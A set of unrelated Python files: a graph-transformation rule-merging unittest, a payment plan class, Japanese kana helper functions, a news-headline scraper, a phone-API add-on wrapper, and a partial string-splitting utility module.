from police_station_transformation.run1.backward_matchers.HSF2SFBackF2F_run1LHS import HSF2SFBackF2F_run1LHS
from police_station_transformation.run1.backward_matchers.HMM2MMBackM2M1_run1LHS import HMM2MMBackM2M1_run1LHS
from police_station_transformation.run1.backward_matchers.HMM2MMBackM2M2_run1LHS import HMM2MMBackM2M2_run1LHS
from police_station_transformation.run1.backward_matchers.HFF2FFBackF2F1_run1LHS import HFF2FFBackF2F1_run1LHS
from police_station_transformation.run1.backward_matchers.HFF2FFBackF2F2_run1LHS import HFF2FFBackF2F2_run1LHS
from police_station_transformation.run1.backward_matchers.HSM2SMBackComplete_run1LHS import HSM2SMBackComplete_run1LHS
from police_station_transformation.run1.backward_matchers.HSF2SFBackComplete_run1LHS import HSF2SFBackComplete_run1LHS
from police_station_transformation.run1.backward_matchers.HMM2MMBackComplete_run1LHS import HMM2MMBackComplete_run1LHS
from police_station_transformation.run1.backward_matchers.HFF2FFBackComplete_run1LHS import HFF2FFBackComplete_run1LHS
from police_station_transformation.run2.transformation.HS2S_run2 import HS2S_run2
from police_station_transformation.run2.transformation.HM2M_run2 import HM2M_run2
from police_station_transformation.run2.transformation.HF2F_run2 import HF2F_run2
from police_station_transformation.run2.transformation.HSM2SM_run2 import HSM2SM_run2
from police_station_transformation.run2.transformation.HSF2SF_run2 import HSF2SF_run2
from police_station_transformation.run2.transformation.HMM2MM_run2 import HMM2MM_run2
from police_station_transformation.run2.transformation.HFF2FF_run2 import HFF2FF_run2
from police_station_transformation.run2.backward_matchers.HSM2SMBackS2S_run2LHS import HSM2SMBackS2S_run2LHS
from police_station_transformation.run2.backward_matchers.HSM2SMBackM2M_run2LHS import HSM2SMBackM2M_run2LHS
from police_station_transformation.run2.backward_matchers.HSF2SFBackS2S_run2LHS import HSF2SFBackS2S_run2LHS
from police_station_transformation.run2.backward_matchers.HSF2SFBackF2F_run2LHS import HSF2SFBackF2F_run2LHS
from police_station_transformation.run2.backward_matchers.HMM2MMBackM2M1_run2LHS import HMM2MMBackM2M1_run2LHS
from police_station_transformation.run2.backward_matchers.HMM2MMBackM2M2_run2LHS import HMM2MMBackM2M2_run2LHS
from police_station_transformation.run2.backward_matchers.HFF2FFBackF2F1_run2LHS import HFF2FFBackF2F1_run2LHS
from police_station_transformation.run2.backward_matchers.HFF2FFBackF2F2_run2LHS import HFF2FFBackF2F2_run2LHS
from police_station_transformation.run2.backward_matchers.HSM2SMBackComplete_run2LHS import HSM2SMBackComplete_run2LHS
from police_station_transformation.run2.backward_matchers.HSF2SFBackComplete_run2LHS import HSF2SFBackComplete_run2LHS
from police_station_transformation.run2.backward_matchers.HMM2MMBackComplete_run2LHS import HMM2MMBackComplete_run2LHS
from police_station_transformation.run2.backward_matchers.HFF2FFBackComplete_run2LHS import HFF2FFBackComplete_run2LHS
from police_station_transformation.run3.transformation.HS2S_run3 import HS2S_run3
from police_station_transformation.run3.transformation.HM2M_run3 import HM2M_run3
from police_station_transformation.run3.transformation.HF2F_run3 import HF2F_run3
from police_station_transformation.run3.transformation.HSM2SM_run3 import HSM2SM_run3
from police_station_transformation.run3.transformation.HSF2SF_run3 import HSF2SF_run3
from police_station_transformation.run3.transformation.HMM2MM_run3 import HMM2MM_run3
from police_station_transformation.run3.transformation.HFF2FF_run3 import HFF2FF_run3
from police_station_transformation.run3.backward_matchers.HSM2SMBackS2S_run3LHS import HSM2SMBackS2S_run3LHS
from police_station_transformation.run3.backward_matchers.HSM2SMBackM2M_run3LHS import HSM2SMBackM2M_run3LHS
from police_station_transformation.run3.backward_matchers.HSF2SFBackS2S_run3LHS import HSF2SFBackS2S_run3LHS
from police_station_transformation.run3.backward_matchers.HSF2SFBackF2F_run3LHS import HSF2SFBackF2F_run3LHS
from police_station_transformation.run3.backward_matchers.HMM2MMBackM2M1_run3LHS import HMM2MMBackM2M1_run3LHS
from police_station_transformation.run3.backward_matchers.HMM2MMBackM2M2_run3LHS import HMM2MMBackM2M2_run3LHS
from police_station_transformation.run3.backward_matchers.HFF2FFBackF2F1_run3LHS import HFF2FFBackF2F1_run3LHS
from police_station_transformation.run3.backward_matchers.HFF2FFBackF2F2_run3LHS import HFF2FFBackF2F2_run3LHS
from police_station_transformation.run3.backward_matchers.HSM2SMBackComplete_run3LHS import HSM2SMBackComplete_run3LHS
from police_station_transformation.run3.backward_matchers.HSF2SFBackComplete_run3LHS import HSF2SFBackComplete_run3LHS
from police_station_transformation.run3.backward_matchers.HMM2MMBackComplete_run3LHS import HMM2MMBackComplete_run3LHS
from police_station_transformation.run3.backward_matchers.HFF2FFBackComplete_run3LHS import HFF2FFBackComplete_run3LHS
from police_station_transformation.run4.transformation.HS2S_run4 import HS2S_run4
from police_station_transformation.run4.transformation.HM2M_run4 import HM2M_run4
from police_station_transformation.run4.transformation.HF2F_run4 import HF2F_run4
from police_station_transformation.run4.transformation.HSM2SM_run4 import HSM2SM_run4
from police_station_transformation.run4.transformation.HSF2SF_run4 import HSF2SF_run4
from police_station_transformation.run4.transformation.HMM2MM_run4 import HMM2MM_run4
from police_station_transformation.run4.transformation.HFF2FF_run4 import HFF2FF_run4
from police_station_transformation.run4.backward_matchers.HSM2SMBackS2S_run4LHS import HSM2SMBackS2S_run4LHS
from police_station_transformation.run4.backward_matchers.HSM2SMBackM2M_run4LHS import HSM2SMBackM2M_run4LHS
from police_station_transformation.run4.backward_matchers.HSF2SFBackS2S_run4LHS import HSF2SFBackS2S_run4LHS
from police_station_transformation.run4.backward_matchers.HSF2SFBackF2F_run4LHS import HSF2SFBackF2F_run4LHS
from police_station_transformation.run4.backward_matchers.HMM2MMBackM2M1_run4LHS import HMM2MMBackM2M1_run4LHS
from police_station_transformation.run4.backward_matchers.HMM2MMBackM2M2_run4LHS import HMM2MMBackM2M2_run4LHS
from police_station_transformation.run4.backward_matchers.HFF2FFBackF2F1_run4LHS import HFF2FFBackF2F1_run4LHS
from police_station_transformation.run4.backward_matchers.HFF2FFBackF2F2_run4LHS import HFF2FFBackF2F2_run4LHS
from police_station_transformation.run4.backward_matchers.HSM2SMBackComplete_run4LHS import HSM2SMBackComplete_run4LHS
from police_station_transformation.run4.backward_matchers.HSF2SFBackComplete_run4LHS import HSF2SFBackComplete_run4LHS
from police_station_transformation.run4.backward_matchers.HMM2MMBackComplete_run4LHS import HMM2MMBackComplete_run4LHS
from police_station_transformation.run4.backward_matchers.HFF2FFBackComplete_run4LHS import HFF2FFBackComplete_run4LHS
from property_prover_rules.traceability_construction.Himesis.HBuildTraceabilityForRuleLHS import HBuildTraceabilityForRuleLHS
from property_prover_rules.traceability_construction.Himesis.HBuildTraceabilityForRuleRHS import HBuildTraceabilityForRuleRHS
from police_station_transformation.traceability.HTraceabilityConstructionLHS import HTraceabilityConstructionLHS
from police_station_transformation.traceability.HTraceabilityConstructionRHS import HTraceabilityConstructionRHS
from police_station_transformation.traceability.HBuildTraceabilityGMLHS import HBuildTraceabilityGMLHS
from police_station_transformation.traceability.HBuildTraceabilityGMRHS import HBuildTraceabilityGMRHS
from copy import deepcopy
from himesis_utils import disjoint_model_union, graph_to_dot
from merge_inter_layer import MergeInterLayerFactory
class Test(unittest.TestCase):
    """Exercises inter-layer rule merging for the police-station
    transformation across its four runs."""

    def setUp(self):
        """Instantiate every per-run rule and its backward matchers."""
        # Transformation rules, keyed '<rule>_<run>'.
        self.rules = {
            'HS2S_run1': HS2S_run1(),
            'HM2M_run1': HM2M_run1(),
            'HF2F_run1': HF2F_run1(),
            'HSM2SM_run1': HSM2SM_run1(),
            'HSF2SF_run1': HSF2SF_run1(),
            'HMM2MM_run1': HMM2MM_run1(),
            'HFF2FF_run1': HFF2FF_run1(),
            'HS2S_run2': HS2S_run2(),
            'HM2M_run2': HM2M_run2(),
            'HF2F_run2': HF2F_run2(),
            'HSM2SM_run2': HSM2SM_run2(),
            'HSF2SF_run2': HSF2SF_run2(),
            'HMM2MM_run2': HMM2MM_run2(),
            'HFF2FF_run2': HFF2FF_run2(),
            'HS2S_run3': HS2S_run3(),
            'HM2M_run3': HM2M_run3(),
            'HF2F_run3': HF2F_run3(),
            'HSM2SM_run3': HSM2SM_run3(),
            'HSF2SF_run3': HSF2SF_run3(),
            'HMM2MM_run3': HMM2MM_run3(),
            'HFF2FF_run3': HFF2FF_run3(),
            'HS2S_run4': HS2S_run4(),
            'HM2M_run4': HM2M_run4(),
            'HF2F_run4': HF2F_run4(),
            'HSM2SM_run4': HSM2SM_run4(),
            'HSF2SF_run4': HSF2SF_run4(),
            'HMM2MM_run4': HMM2MM_run4(),
            'HFF2FF_run4': HFF2FF_run4()}
        # Backward matchers per rule; None for rules without backward patterns.
        self.backwardPatterns = {
            'HS2S_run1': None,
            'HM2M_run1': None,
            'HF2F_run1': None,
            'HSM2SM_run1': [Matcher(HSM2SMBackS2S_run1LHS()),Matcher(HSM2SMBackM2M_run1LHS())],
            'HSF2SF_run1': [Matcher(HSF2SFBackS2S_run1LHS()),Matcher(HSF2SFBackF2F_run1LHS())],
            'HMM2MM_run1': [Matcher(HMM2MMBackM2M1_run1LHS()),Matcher(HMM2MMBackM2M2_run1LHS())],
            'HFF2FF_run1': [Matcher(HFF2FFBackF2F1_run1LHS()),Matcher(HFF2FFBackF2F2_run1LHS())],
            'HS2S_run2': None,
            'HM2M_run2': None,
            'HF2F_run2': None,
            'HSM2SM_run2': [Matcher(HSM2SMBackS2S_run2LHS()),Matcher(HSM2SMBackM2M_run2LHS())],
            'HSF2SF_run2': [Matcher(HSF2SFBackS2S_run2LHS()),Matcher(HSF2SFBackF2F_run2LHS())],
            'HMM2MM_run2': [Matcher(HMM2MMBackM2M1_run2LHS()),Matcher(HMM2MMBackM2M2_run2LHS())],
            'HFF2FF_run2': [Matcher(HFF2FFBackF2F1_run2LHS()),Matcher(HFF2FFBackF2F2_run2LHS())],
            'HS2S_run3': None,
            'HM2M_run3': None,
            'HF2F_run3': None,
            'HSM2SM_run3': [Matcher(HSM2SMBackS2S_run3LHS()),Matcher(HSM2SMBackM2M_run3LHS())],
            'HSF2SF_run3': [Matcher(HSF2SFBackS2S_run3LHS()),Matcher(HSF2SFBackF2F_run3LHS())],
            'HMM2MM_run3': [Matcher(HMM2MMBackM2M1_run3LHS()),Matcher(HMM2MMBackM2M2_run3LHS())],
            'HFF2FF_run3': [Matcher(HFF2FFBackF2F1_run3LHS()),Matcher(HFF2FFBackF2F2_run3LHS())],
            'HS2S_run4': None,
            'HM2M_run4': None,
            'HF2F_run4': None,
            'HSM2SM_run4': [Matcher(HSM2SMBackS2S_run4LHS()),Matcher(HSM2SMBackM2M_run4LHS())],
            'HSF2SF_run4': [Matcher(HSF2SFBackS2S_run4LHS()),Matcher(HSF2SFBackF2F_run4LHS())],
            'HMM2MM_run4': [Matcher(HMM2MMBackM2M1_run4LHS()),Matcher(HMM2MMBackM2M2_run4LHS())],
            'HFF2FF_run4': [Matcher(HFF2FFBackF2F1_run4LHS()),Matcher(HFF2FFBackF2F2_run4LHS())]}
        # Reverse lookup: backward-pattern class name -> owning rule name.
        self.backwardPatterns2Rules = {
            'HSM2SMBackS2S_run1LHS': 'HSM2SM_run1',
            'HSM2SMBackM2M_run1LHS': 'HSM2SM_run1',
            'HSF2SFBackS2S_run1LHS': 'HSF2SF_run1',
            'HSF2SFBackF2F_run1LHS': 'HSF2SF_run1',
            'HMM2MMBackM2M1_run1LHS': 'HMM2MM_run1',
            'HMM2MMBackM2M2_run1LHS': 'HMM2MM_run1',
            'HFF2FFBackF2F1_run1LHS': 'HFF2FF_run1',
            'HFF2FFBackF2F2_run1LHS': 'HFF2FF_run1',
            'HSM2SMBackS2S_run2LHS': 'HSM2SM_run2',
            'HSM2SMBackM2M_run2LHS': 'HSM2SM_run2',
            'HSF2SFBackS2S_run2LHS': 'HSF2SF_run2',
            'HSF2SFBackF2F_run2LHS': 'HSF2SF_run2',
            'HMM2MMBackM2M1_run2LHS': 'HMM2MM_run2',
            'HMM2MMBackM2M2_run2LHS': 'HMM2MM_run2',
            'HFF2FFBackF2F1_run2LHS': 'HFF2FF_run2',
            'HFF2FFBackF2F2_run2LHS': 'HFF2FF_run2',
            'HSM2SMBackS2S_run3LHS': 'HSM2SM_run3',
            'HSM2SMBackM2M_run3LHS': 'HSM2SM_run3',
            'HSF2SFBackS2S_run3LHS': 'HSF2SF_run3',
            'HSF2SFBackF2F_run3LHS': 'HSF2SF_run3',
            'HMM2MMBackM2M1_run3LHS': 'HMM2MM_run3',
            'HMM2MMBackM2M2_run3LHS': 'HMM2MM_run3',
            'HFF2FFBackF2F1_run3LHS': 'HFF2FF_run3',
            'HFF2FFBackF2F2_run3LHS': 'HFF2FF_run3',
            'HSM2SMBackS2S_run4LHS': 'HSM2SM_run4',
            'HSM2SMBackM2M_run4LHS': 'HSM2SM_run4',
            'HSF2SFBackS2S_run4LHS': 'HSF2SF_run4',
            'HSF2SFBackF2F_run4LHS': 'HSF2SF_run4',
            'HMM2MMBackM2M1_run4LHS': 'HMM2MM_run4',
            'HMM2MMBackM2M2_run4LHS': 'HMM2MM_run4',
            'HFF2FFBackF2F1_run4LHS': 'HFF2FF_run4',
            'HFF2FFBackF2F2_run4LHS': 'HFF2FF_run4'}
        # "Complete" backward matchers per rule (single matcher each).
        self.backwardPatternsComplete = {
            'HS2S_run1': None,
            'HM2M_run1': None,
            'HF2F_run1': None,
            'HSM2SM_run1': [Matcher(HSM2SMBackComplete_run1LHS())],
            'HSF2SF_run1': [Matcher(HSF2SFBackComplete_run1LHS())],
            'HMM2MM_run1': [Matcher(HMM2MMBackComplete_run1LHS())],
            'HFF2FF_run1': [Matcher(HFF2FFBackComplete_run1LHS())],
            'HS2S_run2': None,
            'HM2M_run2': None,
            'HF2F_run2': None,
            'HSM2SM_run2': [Matcher(HSM2SMBackComplete_run2LHS())],
            'HSF2SF_run2': [Matcher(HSF2SFBackComplete_run2LHS())],
            'HMM2MM_run2': [Matcher(HMM2MMBackComplete_run2LHS())],
            'HFF2FF_run2': [Matcher(HFF2FFBackComplete_run2LHS())],
            'HS2S_run3': None,
            'HM2M_run3': None,
            'HF2F_run3': None,
            'HSM2SM_run3': [Matcher(HSM2SMBackComplete_run3LHS())],
            'HSF2SF_run3': [Matcher(HSF2SFBackComplete_run3LHS())],
            'HMM2MM_run3': [Matcher(HMM2MMBackComplete_run3LHS())],
            'HFF2FF_run3': [Matcher(HFF2FFBackComplete_run3LHS())],
            'HS2S_run4': None,
            'HM2M_run4': None,
            'HF2F_run4': None,
            'HSM2SM_run4': [Matcher(HSM2SMBackComplete_run4LHS())],
            'HSF2SF_run4': [Matcher(HSF2SFBackComplete_run4LHS())],
            'HMM2MM_run4': [Matcher(HMM2MMBackComplete_run4LHS())],
            'HFF2FF_run4': [Matcher(HFF2FFBackComplete_run4LHS())]}

    def test_combine(self):
        """Merge HMM2MM_run1 with HM2M_run1 across layers and dump the result."""
        build_traceability_for_rule = ARule(HBuildTraceabilityForRuleLHS(),HBuildTraceabilityForRuleRHS())
        build_traceability_for_rule_match = Matcher(HBuildTraceabilityForRuleLHS())
        build_traceability_for_rule_rewrite = Rewriter(HBuildTraceabilityForRuleRHS())
        # Fresh rule instances; only mm2mm and m2m are actually merged below,
        # the rest are kept for interactive inspection/debugging.
        s2s = HS2S_run1()
        m2m = HM2M_run1()
        f2f = HF2F_run1()
        sm2sm = HSM2SM_run1()
        sf2sf = HSF2SF_run1()
        mm2mm = HMM2MM_run1()
        ff2ff = HFF2FF_run1()
        mergeInterLayerFactory = MergeInterLayerFactory(1)
        combineResult = mergeInterLayerFactory.merge_two_rules_inter_layer(mm2mm,m2m)
        graph_to_dot("combinelargerrule", combineResult, 1)
        l = [HSM2SM_run1(),HFF2FF_run1()]
        l.extend([])
        print(l)  # print() form keeps this valid on Python 3 as well
|
'''
plans.py
'''
from forex_python.converter import CurrencyCodes
from .base import Base
class Plan(Base):
    '''
    Plan class for making payment plans.

    Validates currency, interval and amount at construction time and
    stores the normalized (lower-cased) interval.
    '''
    interval = None
    name = None
    amount = None
    plan_code = None
    currency = None
    id = None
    send_sms = True
    send_invoices = True
    description = None
    # Accepted billing intervals (matched case-insensitively).
    __interval_values = ('hourly', 'daily', 'weekly', 'monthly', 'annually')
    def __init__(self, name, interval, amount, currency='NGN', plan_code=None,
                 id=None, send_sms=None, send_invoices=None, description=None):
        """Create a payment plan.

        Args:
            name: human-readable plan name.
            interval: billing interval; one of the accepted interval values.
            amount: plan amount; must be coercible to int.
            currency: ISO currency code (default 'NGN').
            plan_code, id, send_sms, send_invoices, description: optional metadata.

        Raises:
            ValueError: on an invalid currency, interval or amount.
        """
        super().__init__()
        # Check if currency supplied is valid
        if not CurrencyCodes().get_symbol(currency.upper()):
            raise ValueError("Invalid currency supplied")
        if interval.lower() not in self.__interval_values:
            raise ValueError("Interval should be one of 'hourly',"
                             "'daily', 'weekly', 'monthly','annually'"
                             )
        try:
            amount = int(amount)
        except ValueError:
            raise ValueError("Invalid amount")
        else:
            # BUG FIX: the validated, lower-cased interval used to be
            # overwritten afterwards with the raw argument; store the
            # normalized value exactly once.
            self.interval = interval.lower()
            self.name = name
            self.amount = amount
            self.currency = currency
            self.plan_code = plan_code
            self.id = id
            # NOTE(review): class defaults are True, yet omitting these kwargs
            # stores None here — confirm whether None is intended.
            self.send_sms = send_sms
            self.send_invoices = send_invoices
            self.description = description
    def __str__(self):
        return "%s plan" % self.name
|
from __future__ import unicode_literals
from jcconv import kata2hira, hira2kata
from itertools import chain
from printable import PrintableDict, PrintableList
__by_vowels = PrintableDict(**{
    # katakana vowel column -> all katakana whose reading ends in that vowel
    u'ア': u'ワラヤャマハナタサカアァ',
    # BUG FIX: this row contained hiragana ち instead of katakana チ, so チ was
    # missing from the reverse vowel map built from this table (ち still
    # resolves via the hira2kata fallback in char_to_base_vowel).
    u'イ': u'リミヒニチシキイィ',
    u'ウ': u'ルユュムフヌツスクウゥ',
    u'エ': u'レメヘネテセケエェ',
    u'オ': u'ヲロヨョモホノトソコオォ',
})
__to_dakuten = PrintableDict(**{
    # plain kana -> voiced (dakuten) variant; the h-row also lists the
    # semi-voiced (handakuten) variant as a second character.
    u'か': u'が',
    u'き': u'ぎ',
    u'く': u'ぐ',
    u'け': u'げ',
    u'こ': u'ご',
    u'さ': u'ざ',
    u'し': u'じ',
    u'す': u'ず',
    u'せ': u'ぜ',
    u'そ': u'ぞ',
    u'た': u'だ',
    u'ち': u'ぢ',
    u'つ': u'づ',
    u'て': u'で',
    u'と': u'ど',
    u'は': u'ばぱ',
    u'ひ': u'びぴ',
    u'ふ': u'ぶぷ',
    u'へ': u'べぺ',
    u'ほ': u'ぼぽ',
})
__to_mini = PrintableDict(**{
    # full-size kana -> small (sutegana) form
    u'く': u'っ',
    u'つ': u'っ',
    u'や': u'ゃ',
    u'よ': u'ょ',
    u'ゆ': u'ゅ',
    u'わ': u'ゎ',
    u'か': u'ゕ',
    u'け': u'ゖ',
    u'あ': u'ぁ',
    u'い': u'ぃ',
    u'う': u'ぅ',
    u'え': u'ぇ',
    u'お': u'ぉ',
})
# Only these kana may be shrunk at the end of a reading (see extend_mini_reading).
EXTENDABLE_MINIS = (
    u'つ',
    u'く',
)
# Reverse map: voiced/semi-voiced kana -> plain base kana.
__by_dakuten = PrintableDict()
for vowel, letters in __to_dakuten.iteritems():  # NOTE: 'vowel' is really the base kana here
    for letter in letters:
        __by_dakuten[letter] = vowel
# Reverse map: katakana letter -> its base vowel column.
__to_vowels = PrintableDict()
for vowel, letters in __by_vowels.iteritems():
    for letter in letters:
        __to_vowels[letter] = vowel
def codepoint_range(start, end):
    """Yield the characters for codepoints in [start, end).

    Codepoints the interpreter cannot represent (e.g. on narrow Python 2
    builds) are silently skipped.
    """
    # Portability fix: `unichr` only exists on Python 2; fall back to `chr`.
    try:
        to_char = unichr
    except NameError:
        to_char = chr
    for val in range(start, end):
        try:
            yield to_char(val)
        except ValueError:
            # Sometimes certain codepoints can't be used on a machine
            pass
def char_set(value):
    """Expand `value` into characters: a (start, end) pair/list becomes a
    codepoint range, anything else becomes a one-element list."""
    if isinstance(value, (list, tuple)):
        return codepoint_range(*value)
    return [value]
def unipairs(lst):
    """Build a PrintableList of every character described by `lst` (a mix of
    single characters and (start, end) codepoint pairs).

    Uses chain.from_iterable instead of a bare `reduce` (a Python-2-only
    builtin); this also makes an empty `lst` yield an empty list instead of
    raising TypeError.
    """
    return PrintableList(chain.from_iterable(char_set(item) for item in lst))
__KATAKANA = (
    # Katakana: http://en.wikipedia.org/wiki/Katakana
    (0x30A0, 0x30FF + 1),
    (0x31F0, 0x31FF + 1),
    # NOTE(review): the next two ranges (enclosed CJK letters/months and
    # halfwidth/fullwidth forms) also contain non-katakana codepoints such as
    # fullwidth Latin characters — confirm this breadth is intentional for
    # the is_katakana() predicate.
    (0x3200, 0x32FF + 1),
    (0xFF00, 0xFFEF + 1),
)
__HIRAGANA = (
    # Hiragana: http://en.wikipedia.org/wiki/Hiragana
    (0x3040, 0x309F + 1),
    (0x1B000, 0x1B0FF + 1),
)
__KANJI = (
    # CJK Unified Ideographs block
    (0x4e00, 0x9faf + 1),
)
__BONUS_KANA = (
    # wave dash, treated as kana for classification purposes
    u'〜',
)
# Materialized character sets used by the is_* predicates below.
KATAKANA = unipairs(__KATAKANA)
HIRAGANA = unipairs(__HIRAGANA)
KANA = PrintableList(KATAKANA + HIRAGANA + unipairs(__BONUS_KANA))
KANJI = unipairs(__KANJI)
def __is_katakana(char):
    """True when `char` is a single character in the KATAKANA set."""
    return char in KATAKANA
def is_katakana(string):
    """True when every character of `string` is katakana (True for '')."""
    # idiom: all() replaces the hand-rolled loop-and-return-False pattern
    return all(__is_katakana(char) for char in string)
def __is_hiragana(char):
    """True when `char` is a single character in the HIRAGANA set."""
    return char in HIRAGANA
def is_hiragana(string):
    """True when every character of `string` is hiragana (True for '')."""
    # idiom: all() replaces the hand-rolled loop-and-return-False pattern
    return all(__is_hiragana(char) for char in string)
def __is_kana(char):
    """True when `char` is a single character in the combined KANA set."""
    return char in KANA
def is_kana(string):
    """True when every character of `string` is kana (True for '')."""
    # idiom: all() replaces the hand-rolled loop-and-return-False pattern
    return all(__is_kana(char) for char in string)
def __is_kanji(char):
    """True when `char` is a single character in the KANJI set."""
    return char in KANJI
def is_kanji(string):
    """True when every character of `string` is kanji (True for '')."""
    # idiom: all() replaces the hand-rolled loop-and-return-False pattern
    return all(__is_kanji(char) for char in string)
def kana_minus_dakuten(char):
    """Strip any dakuten/handakuten from `char`, preserving its script.

    Katakana input is converted to hiragana for the table lookup and back
    again; anything without a voiced form passes through unchanged.
    """
    if is_katakana(char):
        base = kata2hira(char)
        return hira2kata(__by_dakuten.get(base, base))
    return __by_dakuten.get(char, char)
def kana_plus_dakuten(char):
    """Yield `char` itself, then each of its voiced/semi-voiced variants,
    keeping the input's script (katakana stays katakana)."""
    yield char
    if is_katakana(char):
        for variant in __to_dakuten.get(kata2hira(char), ''):
            yield hira2kata(variant)
    else:
        for variant in __to_dakuten.get(char, ''):
            yield variant
def kana_plus_mini(char):
    """Yield `char` itself, then its small (sutegana) form if one exists,
    keeping the input's script (katakana stays katakana)."""
    yield char
    if is_katakana(char):
        for variant in __to_mini.get(kata2hira(char), ''):
            yield hira2kata(variant)
    else:
        for variant in __to_mini.get(char, ''):
            yield variant
def extend_dakuten_reading(string):
    """Yield `string` plus every variant whose first kana is replaced by a
    voiced/semi-voiced form; the empty string yields just ''."""
    if not string:
        yield ''
        return
    head, tail = string[0], string[1:]
    for variant in kana_plus_dakuten(head):
        yield variant + tail
def extend_mini_reading(string):
    """Yield `string` plus, when its last kana is in EXTENDABLE_MINIS, the
    variant ending in the small (sutegana) form."""
    if not string:
        yield ''
        return
    last = string[-1]
    if last not in EXTENDABLE_MINIS:
        yield string
        return
    prefix = string[:-1]
    for variant in kana_plus_mini(last):
        yield prefix + variant
def char_to_base_vowel(char):
    """Return the katakana vowel column for `char`, ignoring dakuten.

    Raises:
        ValueError: when the character has no vowel mapping.  (ValueError is
        a subclass of the bare Exception raised previously, so existing
        `except Exception` callers still work.)
    """
    base = kana_minus_dakuten(char)
    translated = __to_vowels.get(base, False) or __to_vowels.get(hira2kata(base), False)
    if translated is False:
        # BUG FIX: raise a specific exception type instead of bare Exception.
        raise ValueError(u"Can't convert")
    return translated
def all_to_hiragana(string):
    """Convert `string` to hiragana, resolving prolonged-sound marks
    (ー or |) to the vowel of the preceding output character.

    NOTE(review): assumes a mark never appears first — a leading ー would
    index an empty result and raise IndexError; confirm inputs.
    """
    result = u''
    for char in string:
        if char == u'ー' or char == u'|':
            char = char_to_base_vowel(result[-1])
        result += kata2hira(char)
    return result
if __name__ == u'__main__':
    # Ad-hoc self-tests; `tester` is a project-local assertion helper module.
    from tester import *
    # dakuten stripping
    test_equal(kana_minus_dakuten(u'は'), u'は', u"No Dakuten failure")
    test_equal(kana_minus_dakuten(u'ば'), u'は', u"No Dakuten failure")
    test_equal(kana_minus_dakuten(u'ぱ'), u'は', u"No Dakuten failure")
    test_equal(kana_minus_dakuten(u'ジ'), u'シ', u"Katakana failure")
    test_equal(kana_minus_dakuten(u'本'), u'本', u"Kanji changed")
    # script classification predicates
    test_true(is_katakana(u'ハ'), u"Katakana check wrong")
    test_true(is_katakana(u'ー'), u"Katakana check wrong")
    test_true(is_katakana(u'ジ'), u"Katakana check wrong")
    test_true(is_katakana(u'ッ'), u"Katakana check wrong")
    test_true(not is_katakana(u'本'), u"Katakana Kanji check wrong")
    test_true(not is_katakana(u'っ'), u"Katakana small hiragana check wrong")
    test_true(not is_katakana(u'は'), u"Katakana hiragana wrong")
    test_true(is_hiragana(u'っ'), u"Hiragana check wrong")
    test_true(is_hiragana(u'つ'), u"Hiragana check wrong")
    test_true(is_hiragana(u'を'), u"Hiragana check wrong")
    test_true(not is_hiragana(u'本'), u"Hiragana Kanji check wrong")
    test_true(not is_hiragana(u'ッ'), u"Hiragana small katakana check wrong")
    test_true(not is_hiragana(u'ハ'), u"Hiragana katakana check wrong")
    test_true(is_kana(u'っ'), u"Kana check wrong")
    test_true(is_kana(u'つ'), u"Kana check wrong")
    test_true(is_kana(u'を'), u"Kana check wrong")
    test_true(is_kana(u'ッ'), u"Kana check wrong")
    test_true(is_kana(u'ハ'), u"Kana check wrong")
    test_true(is_kana(u'〜・'), u"Kana special check wrong")
    test_true(not is_kana(u'本'), u"Kana check wrong")
    test_equal(kana_minus_dakuten(u'は'), u'は')
    test_equal(kana_minus_dakuten(u'ば'), u'は')
    test_equal(kana_minus_dakuten(u'バ'), u'ハ')
    test_equal(kana_minus_dakuten(u'本'), u'本')
    # dakuten expansion and reading extension generators
    test_equal(''.join(kana_plus_dakuten(u'は')), u'はばぱ')
    test_equal(''.join(kana_plus_dakuten(u'本')), u'本')
    test_equal(''.join(kana_plus_dakuten(u'シ')), u'シジ')
    test_list_equal(extend_dakuten_reading(u'しゃし'), [u'しゃし', u'じゃし'])
    test_list_equal(extend_mini_reading(u'し'), [u'し'])
    test_list_equal(extend_mini_reading(u'いつ'), [u'いつ', u'いっ'])
    # prolonged-sound mark resolution
    test_equal(all_to_hiragana(u'ジータ'), u'じいた')
|
import requests, os
from bs4 import BeautifulSoup
url = 'http://www.nytimes.com'  # front page whose <article> headlines are scraped
def extractArticles(url):
    """Scrape headline texts from `url` and write them, de-duplicated and
    sorted, one per line, to ./articles/headlines2.txt.
    """
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    headlines = []
    for article in soup.find_all('article'):
        # Guard each level: not every <article> carries an <h2> with a link.
        h2 = article.find('h2')
        if h2 is not None and h2.find('a') is not None:
            heading = h2.find('a').get_text().strip()
            if heading != "":
                headlines.append(heading)
    headlines = sorted(set(headlines))
    # Ensure the output directory exists (the original open() failed when it
    # was missing) and close the file deterministically via `with`.
    if not os.path.isdir('./articles'):
        os.makedirs('./articles')
    with open('./articles/headlines2.txt', 'w') as f:
        for heading in headlines:
            f.write(heading)
            f.write('\n')
extractArticles(url)  # run the scrape at import/script execution time
|
from base import IfbyphoneApiBase
class Addons(IfbyphoneApiBase):
    """API wrapper for account add-on operations."""
    def list(self):
        """Retrieve every add-on purchased for the account."""
        self.options['action'] = 'addons.list'
        return self.call(self.options)
    def purchase(self, **kwargs):
        """Buy an add-on for the account.

        keyword arguments:
        item_id      -- ID number of the desired addon
        qty          -- the quantity of the addon
        send_receipt -- set to 1 to send a receipt to account email
        """
        payload = self.options
        payload.update(kwargs)
        payload['action'] = 'addons.purchase'
        return self.call(payload)
|
"""Utility functions.
"""
from collections import OrderedDict
from .bsd_checksum import bsd_checksum # make name available from this module
def n_(s, replacement='_'):
    """Replace NUL characters in string-like values to make binary fields
    readable; non-string values pass through unchanged.
    """
    string_types = (str, unicode, bytearray)
    if not isinstance(s, string_types):
        return s
    return s.replace('\0', replacement)
def split_string(s, *ndxs):
    """Split `s` at the given indexes.

    Usage:
        >>> print split_string('D2008022002', 1, 5, 7, 9)
        ['D', '2008', '02', '20', '02']
    """
    if len(ndxs) == 0:
        return [s]
    if len(ndxs) == 1:
        i = ndxs[0]
        return [s[:i], s[i:]]
    res = []
    b = 0
    while ndxs:
        a, b, ndxs = b, ndxs[0], ndxs[1:]
        res.append(s[a:b])
    res.append(s[b:])
    return res
def split_fields(s, sizes):
    """Split a string into fields based on field `sizes`.

    A single None entry in `sizes` is a wildcard absorbing whatever length
    remains after the explicit sizes.
    """
    slen = len(s)
    if None in sizes:
        nonesize = slen - sum(v for v in sizes if v is not None)
        # BUG FIX: `v or nonesize` also replaced explicit zero-width fields
        # with the wildcard size; only None should be substituted.
        sizes = [nonesize if v is None else v for v in sizes]
    ndxs = [sizes[0]]
    cur = 1
    while cur < len(sizes) - 1:
